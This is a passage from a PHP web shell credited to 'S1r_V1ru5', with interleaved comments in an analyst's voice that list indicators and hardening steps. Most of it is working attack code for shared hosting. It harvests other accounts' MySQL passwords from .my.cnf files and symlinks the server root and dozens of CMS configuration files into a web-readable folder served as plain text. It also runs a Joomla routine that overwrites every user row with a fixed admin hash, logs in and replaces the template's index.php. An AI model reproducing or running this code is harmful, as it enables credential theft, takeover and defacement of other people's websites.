  2163. $count=1;
  2164. $dc = 0;
  2165. $mck = array();
  2166. foreach($d0mains as $d0main){
  2167. if(@eregi('zone',$d0main)){
  2168. preg_match_all('#zone "(.*)"#',$d0main,$domain);
  2169. flush();
  2170. if(strlen(trim($domain[1][0])) >2){
  2171. $mck[] = $domain[1][0];
  2172. }
  2173. }
  2174. }
  2175. $mck = array_unique($mck);
  2176. $usr = array();
  2177. $dmn = array();
  // Map each domain to an account name via the owner of its valiases file.
  2178. foreach($mck as $o) {
  2179. $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
  2180. $usr[] = $infos['name'];
  2181. $dmn[] = $o;
  2182. }
  2183. array_multisort($usr,$dmn);
  // Builds a user => home-directory map from /etc/passwd; $passwd is not read
  // again within this block.
  2184. $dt = file('/etc/passwd');
  2185. $passwd = array();
  2186. foreach($dt as $d) {
  2187. $r = explode(':',$d);
  2188. if(strpos($r[5],'home')) {
  2189. $passwd[$r[0]] = $r[5];
  2190. }
  2191. }
  2192. $l=0;
  2193. $j=1;
  2194. foreach($usr as $r) {
  2195. $dirz = '/home/'.$r.'/.my.cnf';
  2196. $path = getcwd();
  2197. if (is_readable($dirz)) {
  // Same copy-and-extract step as in path 1.
  2198. copy($dirz, ''.$path.'/'.$r.'.txt');
  2199. $p=file_get_contents(''.$path.'/'.$r.'.txt');
  2200. $password=entre2v2($p,'password="','"');
  2201. echo "<tr><td>".$count++."</td><td><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td>'.$r."</td><td>".$password."</td><td><a href='".$r.".txt' target='_blank'>Click Here</a></td></tr>";
  2202. $dc++;
  2203. flush();
  2204. $l=$l?0:1;
  2205. $j++;
  2206. }
  2207. }
  2208. }
  2209. echo '</table>';
  2210. $total = $dc;
  2211. echo '<br><div class="result">Total cPanel Found = '.$total.'</h3><br />';
  2212. echo '</center>';
  2213.  
  2214. }
  2215. }else{
  2216. echo "<div class='result'><i><font color='#FF0000'>ERROR</font><br><font color='#FF0000'>/var/named</font> or <font color='#FF0000'>etc/named.conf</font> Not Accessible!</i></div>";
  2217. }
  2218.  
  2219. echo "</body></html>";
  2220. }
  2221. ?>
  2222. <?
  2223. ####################################################
  2224. #####V1ru5 v1.0 ############
  2225. #####CODED by S1r_V1ru5 ############
  2226. #####V1ru5 Group Cyber Army ############
  2227. ####################################################
  2228.  
  2229.  
  // Lifts the execution time limit and turns off PHP error reporting for the
  // remainder of the request.
  2230. set_time_limit(0);
  2231. error_reporting(0);
  2232.  
  2233.  
  /**
   * Report whether PHP's open_basedir restriction is configured.
   *
   * @return string HTML snippet: blue "ON" when ini_get("open_basedir") is
   *                truthy, green "OFF" otherwise.
   */
  function openBaseDir()
  {
      if (ini_get("open_basedir")) {
          return '<font color="blue">ON</font>';
      }
      return '<font color="green">OFF</font>';
  }
  2247.  
  2248.  
  2249.  
  2250.  
  2251.  
  2252.  
  2253.  
  2254. ##.htaccess
  // Symlink staging. This run sits at top level with no request-parameter guard
  // in view, so it executes on every request that reaches this point.
  // It creates a world-writable `empek` directory, links `empek/amis` to the
  // filesystem root, and drops an .htaccess that maps .php and .html to
  // text/plain -- apparently so that linked configuration files are returned as
  // text instead of being executed.
  // On-disk indicators: a directory named `empek`, the symlink `empek/amis`,
  // `empek/.htaccess` with the content below, and `<user>-<CMS>.txt` symlinks.
  // Hardening that defeats this: Apache SymLinksIfOwnerMatch without letting
  // .htaccess re-enable FollowSymLinks (AllowOverride), and `symlink` listed in
  // PHP's disable_functions.
  2255. @mkdir('empek',0777);
  2256. @symlink("/","empek/amis");
  2257. $htaccss = "Options all
  2258. DirectoryIndex Sux.html
  2259. AddType text/plain .php
  2260. AddHandler server-parsed .php
  2261. AddType text/plain .html
  2262. AddHandler txt .html
  2263. Require None
  2264. Satisfy Any";
  2265.  
  2266. file_put_contents("empek/.htaccess",$htaccss);
  2267. $etc = file_get_contents("/etc/passwd");
  2268. $etcz = explode("\n",$etc);
  2269.  
  2270.  
  2271. ##Symlink to the amis
  // For every /etc/passwd line, the first field is taken as an account name and
  // combined with components 1 and 3 of the current working directory
  // (presumably the home base and web-root name -- confirm on the affected
  // host) to guess where common CMS configuration files live. Each guess is
  // linked into `empek/` under a name that identifies the account and product.
  2272. foreach($etcz as $etz){
  2273. $etcc = explode(":",$etz);
  2274. error_reporting(0);
  2275.  
  2276. $current_dir = posix_getcwd();
  2277. $dir = explode("/",$current_dir);
  2278.  
  2279. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp-config.php',"empek/".$etcc[0].'-WordPress.txt');
  2280. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/blog/wp-config.php',"empek/".$etcc[0].'-WordPress.txt');
  2281. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp/wp-config.php',"empek/".$etcc[0].'-WordPress.txt');
  2282. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/wp-config.php',"empek/".$etcc[0].'-WordPress.txt');
  2283. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/config.php',"empek/".$etcc[0].'-PhpBB.txt');
  2284. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/config.php',"empek/".$etcc[0].'-vBulletin.txt');
  2285. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/configuration.php',"empek/".$etcc[0].'-Joomla.txt');
  2286. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/web/configuration.php',"empek/".$etcc[0].'-Joomla.txt');
  2287. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/joomla/configuration.php',"empek/".$etcc[0].'-Joomla.txt');
  2288. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/configuration.php',"empek/".$etcc[0].'-Joomla.txt');
  2289. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/conf_global.php',"empek/".$etcc[0].'-IPB.txt');
  2290. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/inc/config.php',"empek/".$etcc[0].'-MyBB.txt');
  2291. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/Settings.php',"empek/".$etcc[0].'-SMF.txt');
  2292. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/sites/default/settings.php',"empek/".$etcc[0].'-Drupal.txt');
  2293. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/e107_config.php',"empek/".$etcc[0].'-e107.txt');
  2294. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/datas/config.php',"empek/".$etcc[0].'-Seditio.txt');
  2295. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/configure.php',"empek/".$etcc[0].'-osCommerce.txt');
  2296. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/client/configuration.php',"empek/".$etcc[0].'-WHMCS.txt');
  2297. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientes/configuration.php',"empek/".$etcc[0].'-WHMCS.txt');
  2298. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/support/configuration.php',"empek/".$etcc[0].'-WHMCS.txt');
  2299. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/supportes/configuration.php',"empek/".$etcc[0].'-WHMCS.txt');
  2300. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmcs/configuration.php',"empek/".$etcc[0].'-WHMCS.txt');
  2301. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domain/configuration.php',"empek/".$etcc[0].'-WHMCS.txt');
  2302. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/hosting/configuration.php',"empek/".$etcc[0].'-WHMCS.txt');
  2303. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmc/configuration.php',"empek/".$etcc[0].'-WHMCS.txt');
  2304. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/billing/configuration.php',"empek/".$etcc[0].'-WHMCS.txt');
  2305. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/portal/configuration.php',"empek/".$etcc[0].'-WHMCS.txt');
  2306. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/order/configuration.php',"empek/".$etcc[0].'-WHMCS.txt');
  2307. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientarea/configuration.php',"empek/".$etcc[0].'-WHMCS.txt');
  2308. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domains/configuration.php',"empek/".$etcc[0].'-WHMCS.txt');
  2309. }
  2310. #####################
  2311.  
  2312.  
  2313.  
  2314.  
  2315.  
  2316.  
  // `do` dispatcher: five ways of building a domain -> account table, each row
  // linking into the `empek/amis` root symlink at the account's home directory.
  // The cases differ only in where the domain or account list comes from
  // (/var/named, /etc/passwd, /etc/named.conf, /etc/valiases, or UID lookups).
  // Log hunting: requests carrying `do=var_named`, `do=etc_passwd`,
  // `do=etc_named.conf`, `do=etc_valiases` or `do=posix`, and follow-up GETs
  // under `empek/amis/`.
  2317. if(isset($_REQUEST['do'])){
  2318. switch ($_REQUEST['do']){
  2319. ###################################CASE: var_named
  2320. case 'var_named':
  2321.  
  // Domains from the *.db zone files in /var/named; the account is the owner of
  // the matching /etc/valiases/<domain> file.
  2322. if(is_readable("/var/named")){
  2323. echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
  2324. echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td></center><b>SYMLINK</b></center></td>';
  2325. $list = scandir("/var/named");
  2326. foreach($list as $domain){
  2327. if(strpos($domain,".db")){
  2328. $i += 1;
  2329. $domain = str_replace('.db','',$domain);
  2330. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  2331.  
  2332. echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td><td class='td1'><center><font color='blue'>".$owner['name']."</font></center></td><td class='td1'><center><a href='empek/amis".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
  2333. }
  2334. }
  2335. echo "<center>Total Domains Found: ".$i."</center><br />";
  2336. }else{ echo "<tr><td class='td1'>can't read [ /var/named ]</td><tr>"; }
  2337.  
  2338. break;
  2339. #####################END
  2340.  
  2341.  
  2342.  
  2343.  
  2344.  
  2345.  
  2346.  
  2347. ###########CASE: /etc/passwd
  2348. case 'etc_passwd':
  2349.  
  2350.  
  // Same table, but only for domains whose valiases owner matches an account
  // name read from /etc/passwd.
  2351. error_reporting(0);
  2352. $etc = file_get_contents("/etc/passwd");
  2353. $etcz = explode("\n",$etc);
  2354. if(is_readable("/etc/passwd")){
  2355.  
  2356. echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
  2357. echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td><center><b>SYMLINK</b></center></td>';
  2358.  
  2359. $list = scandir("/var/named");
  2360.  
  2361. foreach($etcz as $etz){
  2362. $etcc = explode(":",$etz);
  2363.  
  2364. foreach($list as $domain){
  2365. if(strpos($domain,".db")){
  2366. $domain = str_replace('.db','',$domain);
  2367. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  2368. if($owner['name'] == $etcc[0])
  2369. {
  2370. $i += 1;
  2371. echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td><center><td class='td1'><font color='blue'>".$owner['name']."</font></center></td><td class='td1'><center><a href='empek/amis".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
  2372. }}}}
  2373. echo "<center>Total Domains Found: ".$i."</center><br />";}
  2374.  
  2375. break;
  2376. #########################END
  2377.  
  2378.  
  2379.  
  2380.  
  2381.  
  2382.  
  2383.  
  2384. ########CASE: etc_named.conf
  2385. case 'etc_named.conf':
  2386.  
  // Domains parsed from the `zone "..." {` lines of /etc/named.conf.
  2387. if(is_readable("/etc/named.conf")){
  2388. echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
  2389. echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td></center><b>SYMLINK</b></center></td>';
  2390. $named = file_get_contents("/etc/named.conf");
  2391. preg_match_all('%zone \"(.*)\" {%',$named,$domains);
  2392. foreach($domains[1] as $domain){
  2393. $domain = trim($domain);
  2394. $i += 1;
  2395. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  2396. echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td><td class='td1'><center><font color='blue'>".$owner['name']."</font></center></td><td class='td1'><center><a href='empek/amis".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
  2397. }
  2398. echo "<center>Total Domains Found: ".$i."</center><br />";
  2399.  
  2400. } else { echo "<tr><td class='td1'>can't read [ /etc/named.conf ]</td></tr>"; }
  2401.  
  2402. break;
  2403. ##################################END
  2404.  
  2405.  
  2406.  
  2407.  
  2408.  
  2409.  
  2410.  
  2411.  
  2412. #############CASE etc_valiases
  2413. case 'etc_valiases':
  2414.  
  // Domains taken straight from the file names in /etc/valiases.
  2415. if(is_readable("/etc/valiases")){
  2416. echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
  2417. echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td></center><b>SYMLINK</b></center></td>';
  2418. $list = scandir("/etc/valiases");
  2419. foreach($list as $domain){
  2420. $i += 1;
  2421. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  2422. echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td><center><td class='td1'><font color='blue'>".$owner['name']."</font></center></td><td class='td1'><center><a href='empek/amis".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
  2423. }
  2424. echo "<center>Total Domains Found: ".$i."</center><br />";
  2425. } else { echo "<tr><td class='td1'>can't read [ /etc/valiases ]</td></tr>"; }
  2426.  
  2427. break;
  2428. ############END
  2429.  
  2430.  
  2431.  
  2432.  
  2433.  
  2434. ##########CASE posix
  2435. case 'posix':
  2436.  
  2437. echo <<<empek
  2438. <form method='POST'>
  2439. <br><br>Input Limit<br>
  2440. <input size='20' value='0' name='min' type='text'>
  2441. to
  2442. <input size='20' value='1024' name='max' type='text'>
  2443. <br>
  2444. <input value='SYMLINK' name='' type='submit'><br><br>
  2445. </form>
  2446.  
  2447. empek;
  // Account discovery without reading /etc/passwd: numeric UIDs starting at the
  // posted `min` are resolved one by one with posix_getpwuid(), and each hit is
  // matched against the valiases owners of the /var/named domains.
  2448. if($_POST){
  2449. $min = $_POST['min'];
  2450. $max = $_POST['max'];
  2451.  
  2452. echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
  2453. echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td></center><b>SYMLINK</b></center></td>';
  2454.  
  2455. $p = 0;
  2456. error_reporting(0);
  2457. $list = scandir("/var/named");
  2458. for($p = $min; $min <= $max; $p++)
  2459. {
  2460. $user = posix_getpwuid($p);
  2461. if(is_array($user)){
  2462.  
  2463. foreach($list as $domain){
  2464. if(strpos($domain,".db")){
  2465. $domain = str_replace('.db','',$domain);
  2466. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  2467. if($owner['name'] == $user['name'])
  2468. {
  2469. $i += 1;
  2470. echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td><center><td class='td1'><font color='blue'>".$user['name']."</font></center></td><td class='td1'><center><a href='empek/amis".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
  2471. }
  2472. }
  2473. }
  2474. }
  2475.  
  2476. }
  2477. echo "<center>Total Domains Found: ".$i."</center><br />";
  2478. }
  2479.  
  2480. break;
  2481. #################END
  2482.  
  2483. }
  2484. }
  2485.  
  2486. ?>
  2487. <?php
  2488.  
  2489.  
  2490. // getting info from inside :)
  /**
   * Extract the trimmed text that sits between two marker strings.
   *
   * @param string $text   Haystack to search.
   * @param string $bideya Start marker; $text is split on it.
   * @param string $niheya End marker; the chosen piece is cut at its first occurrence.
   * @param int    $i      Which piece after splitting on the start marker (1 = text after the first occurrence).
   * @return string Text between the markers with surrounding whitespace removed.
   */
  function tunisia($text,$bideya,$niheya,$i=1){
      $pieces = explode($bideya, $text);
      $afterStart = $pieces[$i];
      $beforeEnd = explode($niheya, $afterStart);
      return trim($beforeEnd[0]);
  }
  2496.  
  /**
   * Build an 8-character lowercase alphanumeric token.
   *
   * The generator is seeded from microtime() and drawn with rand(), so the
   * value is a throwaway name, not a secret. Elsewhere in this file the result
   * is used as a cURL cookie-jar file name.
   *
   * @return string Eight characters taken from the alphabet below.
   */
  function randomt() {
      $alphabet = "abcdefghijkmnopqrstuvwxyz023456789";
      srand((double)microtime()*1000000);
      $token = '';
      for ($n = 0; $n <= 7; $n++) {
          $token .= substr($alphabet, rand() % 33, 1);
      }
      return $token;
  }
  2510.  
  2511. // joomla index changer
  /**
   * Defacement routine for a Joomla site whose configuration file text is in $conf.
   *
   * Steps visible below: (1) pull DB host, user, password, name and table prefix
   * out of $conf by string matching; (2) connect and run an UPDATE with no WHERE
   * clause that sets every row of `<prefix>users` to username `admin`, a fixed
   * password hash and Super Administrator, unblocked; (3) log in to
   * http://$domain/administrator over cURL; (4) overwrite the active template's
   * index.php with $content. Two code paths exist, selected by whether a
   * `<prefix>extensions` table is present.
   *
   * Incident-response indicators taken from this code: every row of the users
   * table sharing username `admin` and hash 71a4d4cd2f30b185d707718273b17d05;
   * an administrator login immediately followed by com_templates source-save
   * requests; the MSIE 7.0b / Alexa Toolbar user agent set in the second branch.
   * Recovery needs the users table restored from backup (the original rows are
   * overwritten, not copied) and the DB password in configuration.php rotated.
   *
   * @param string $conf    Contents of a Joomla configuration.php.
   * @param string $content Replacement template source, placed as-is in the POST body.
   * @param string $domain  Host name used to build the /administrator URL.
   * @return array 'cond' (1 when the save response contained the success marker, else 0),
   *               'output' (HTML progress log), 'template' (template name read from the DB).
   */
  2512. function index_changer_joomla($conf, $content, $domain) {
  2513. $doler = '$';
  2514. $username = tunisia($conf, $doler."user = '", "';");
  2515. $password = tunisia($conf, $doler."password = '", "';");
  2516. $dbname = tunisia($conf, $doler."db = '", "';");
  2517. $prefix = tunisia($conf, $doler."dbprefix = '", "';");
  2518. $host = tunisia($conf, $doler."host = '","';");
  // $co is a random name later used as the cURL cookie-jar file.
  2519. $co=randomt();
  2520. $site_url = "http://".$domain."/administrator";
  2521. $output = '';
  2522. $cond = 0;
  2523. $link=mysql_connect($host, $username, $password);
  2524. if($link) {
  2525. mysql_select_db($dbname,$link) ;
  // Destructive: rewrites all user rows at once (no WHERE clause).
  2526. $req1 = mysql_query("UPDATE `".$prefix."users` SET `username` ='admin' , `password` = '71a4d4cd2f30b185d707718273b17d05', `usertype` = 'Super Administrator', `block` = 0");
  // Presence of the `extensions` table selects the first branch below.
  2527. $req = mysql_numrows(mysql_query("SHOW TABLES LIKE '".$prefix."extensions'"));
  2528. } else {
  2529. $output.= "[-] DB Error<br />";
  2530. }
  2531.  
  2532. if($req1){
  2533. if ($req) {
  // Branch A: schema with `template_styles` / `extensions` tables. Looks up the
  // default site template and its extension id.
  2534. $req = mysql_query("SELECT * from `".$prefix."template_styles` WHERE `client_id` = '0' and `home` = '1'");
  2535. $data = mysql_fetch_array($req);
  2536. $template_name = $data["template"];
  2537.  
  2538. $req = mysql_query("SELECT * from `".$prefix."extensions` WHERE `name`='".$template_name."' or `element` = '".$template_name."'");
  2539. $data = mysql_fetch_array($req);
  2540. $template_id = $data["extension_id"];
  2541.  
  // Fetch the admin login page to scrape the hidden `return` value and the
  // anti-CSRF token field name.
  2542. $url2=$site_url."/index.php";
  2543. $ch = curl_init();
  2544. curl_setopt($ch, CURLOPT_URL, $url2);
  2545. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2546. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2547. curl_setopt($ch, CURLOPT_HEADER, 0);
  2548. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  2549. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  2550. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  2551. $buffer = curl_exec($ch);
  2552. $return = tunisia($buffer ,'<input type="hidden" name="return" value="','"');
  2553. $hidden = tunisia($buffer ,'<input type="hidden" name="','" value="1"',4);
  2554.  
  2555. if($return && $hidden) {
  // Submit the login form; success is judged by "com_config" appearing in the
  // response body.
  2556. curl_setopt($ch, CURLOPT_URL, $url2);
  2557. curl_setopt($ch, CURLOPT_POST, 1);
  2558. curl_setopt($ch, CURLOPT_REFERER, $url2);
  2559. curl_setopt($ch, CURLOPT_POSTFIELDS, "username=admin&passwd=123123&option=com_login&task=login&return=".$return."&".$hidden."=1");
  2560. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2561. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2562. curl_setopt($ch, CURLOPT_HEADER, 0);
  2563. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  2564. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  2565. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  2566. $buffer = curl_exec($ch);
  2567. $pos = strpos($buffer,"com_config");
  2568. if($pos === false) {
  2569. $output.= "[-] Login Error<br />";
  2570. } else {
  2571. $output.= "[+] Login Successful<br />";
  2572. }
  2573. }
  2574. if($pos){
  // Open the template source editor for index.php to obtain a fresh token.
  2575. $url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
  2576. $ch = curl_init();
  2577. curl_setopt($ch, CURLOPT_URL, $url2);
  2578. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2579. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2580. curl_setopt($ch, CURLOPT_HEADER, 0);
  2581. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  2582. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  2583. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  2584. $buffer = curl_exec($ch);
  2585.  
  2586. $hidden2=tunisia($buffer ,'<input type="hidden" name="','" value="1"',2);
  2587. if($hidden2) {
  2588. $output.= "[+] index.php file found in Theme Editor<br />";
  2589. } else {
  2590. $output.= "[-] index.php Not found in Theme Editor<br />";
  2591. }
  2592. }
  2593. if($hidden2) {
  // Save step: posts $content as the new template index.php (task=source.save).
  2594. $url2=$site_url."/index.php?option=com_templates&layout=edit";
  2595. $ch = curl_init();
  2596. curl_setopt($ch, CURLOPT_URL, $url2);
  2597. curl_setopt($ch, CURLOPT_POST, 1);
  2598. curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$content."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");
  2599. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2600. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2601. curl_setopt($ch, CURLOPT_HEADER, 0);
  2602. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  2603. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  2604. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  2605. $buffer = curl_exec($ch);
  2606. curl_close($ch);
  2607.  
  2608. $pos = strpos($buffer,'<dd class="message message">');
  2609. $cond = 0;
  2610. if($pos === false) {
  2611. $output.= "[-] Updating Index.php Error<br />";
  2612.  
  2613. } else {
  2614. $output.= "[+] Index.php Template successfully saved<br />";
  2615. $cond = 1;
  2616. }
  2617. }
  2618. }
  2619. else {
  // Branch B: schema with a `templates_menu` table. Same login / edit / save
  // sequence, using the edit_source and save_source tasks and a fixed user agent.
  2620. $req =mysql_query("SELECT * from `".$prefix."templates_menu` WHERE client_id='0'");
  2621. $data = mysql_fetch_array($req);
  2622. $template_name=$data["template"];
  2623. $useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
  2624. $url2=$site_url."/index.php";
  2625. $ch = curl_init();
  2626. curl_setopt($ch, CURLOPT_URL, $url2);
  2627. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2628. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2629. curl_setopt($ch, CURLOPT_HEADER, 0);
  2630. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
  2631. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  2632. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  2633. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  2634. $buffer = curl_exec($ch);
  2635. $hidden=tunisia($buffer ,'<input type="hidden" name="','" value="1"',3);
  2636.  
  2637. if($hidden) {
  2638. curl_setopt($ch, CURLOPT_URL, $url2);
  2639. curl_setopt($ch, CURLOPT_POST, 1);
  2640. curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=jancok&option=com_login&task=login&".$hidden."=1");
  2641. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2642. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2643. curl_setopt($ch, CURLOPT_HEADER, 0);
  2644. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  2645. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  2646. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  2647. $buffer = curl_exec($ch);
  2648. $pos = strpos($buffer,"com_config");
  2649. if($pos === false) {
  2650. $output.= "[-] Login Error<br />";
  2651. } else {
  2652. $output.= "[+] Login Successful<br />";
  2653. }
  2654. }
  2655.  
  2656. if($pos) {
  2657. $url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;
  2658. curl_setopt($ch, CURLOPT_URL, $url2);
  2659. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2660. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  2661. curl_setopt($ch, CURLOPT_HEADER, 0);
  2662. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  2663. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  2664. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  2665. $buffer = curl_exec($ch);
  2666. $hidden2=tunisia($buffer ,'<input type="hidden" name="','" value="1"',6);
  2667. if($hidden2) {
  2668. $output.= "[+] index.php file founded in Theme Editor<br />";
  2669. } else {
  2670. $output.= "[-] index.php Not found in Theme Editor<br />";
  2671. }
  2672. }
  2673.  
  2674. if($hidden2) {
  2675. $url2=$site_url."/index.php?option=com_templates&layout=edit";
  2676. curl_setopt($ch, CURLOPT_URL, $url2);
  2677. curl_setopt($ch, CURLOPT_POST, 1);
  2678. curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$content."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");
  2679. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2680. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  2681. curl_setopt($ch, CURLOPT_HEADER, 0);
  2682. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  2683. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  2684. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  2685. $buffer = curl_exec($ch);
  2686. curl_close($ch);
  2687.  
  2688. $pos = strpos($buffer,'<dd class="message message fade">');
  2689. $cond = 0;
  2690. if($pos === false) {
  2691. $output.= "[-] Updating Index.php Error<br />";
  2692. } else {
  2693. $output.= "[+] Index.php Template successfully saved<br />";
  2694. $cond = 1;
  2695. }
  2696. }
  2697. }
  2698. } else {
  2699. $output.= "[-] DB Error<br />";
  2700. }
  // Removes the cookie-jar file; $base_path is a global defined outside this view.
  2701. global $base_path;
  2702. unlink($base_path.$co);
  2703. return array('cond'=>$cond, 'output'=>$output , 'template'=>$template_name);
  2704. }
  2705.  
  2706.  
  2707. // wordpress index changer
  2708.  
  /**
   * ANALYST NOTE (malicious code): WordPress half of this web shell's mass-defacement feature.
   *
   * What the visible code does, in order:
   *  1. Builds a PHP dropper as a string ($preindex). When run, the dropper reads $index and writes it to
   *     index.html / index.php / index.htm under the first "public_html" directory in its own path, then
   *     unlinks itself.
   *  2. Extracts DB_USER, DB_PASSWORD, DB_NAME, DB_HOST and the table prefix from the wp-config.php text in
   *     $conf using tunisia() (defined outside this excerpt; presumably a "text between two markers" helper).
   *  3. Connects with the legacy mysql_* extension (removed in PHP 7.0) and overwrites user_login/user_pass
   *     of the row with ID 1 in <prefix>users.
   *  4. Logs in through wp-login.php with that account and submits the dropper via wp-admin/theme-editor.php
   *     as the new content of the active theme's index.php.
   *
   * @param string $conf  Text of a wp-config.php file.
   * @param string $index URL of the replacement page; it is concatenated unescaped into the generated PHP.
   * @return array Keys: 'cond' (set to 1 when an update is reported as saved), 'output' (HTML log lines),
   *               'template' (value of the 'template' option).
   *
   * Observable traces for responders (all taken from the code below): user ID 1 renamed to "admin" with the
   * hard-coded 32-hex password value, theme-editor POSTs carrying the fixed "MSIE 7.0b ... Alexa Toolbar"
   * User-Agent, a COOKIE.txt cookie jar in the shell's working directory, and a modified theme index.php.
   * Hardening that removes this path: define DISALLOW_FILE_EDIT in wp-config.php, keep wp-config.php
   * unreadable by other accounts, and use a database user that cannot be reached with another tenant's
   * credentials.
   */
  2709. function index_changer_wp($conf, $index) {
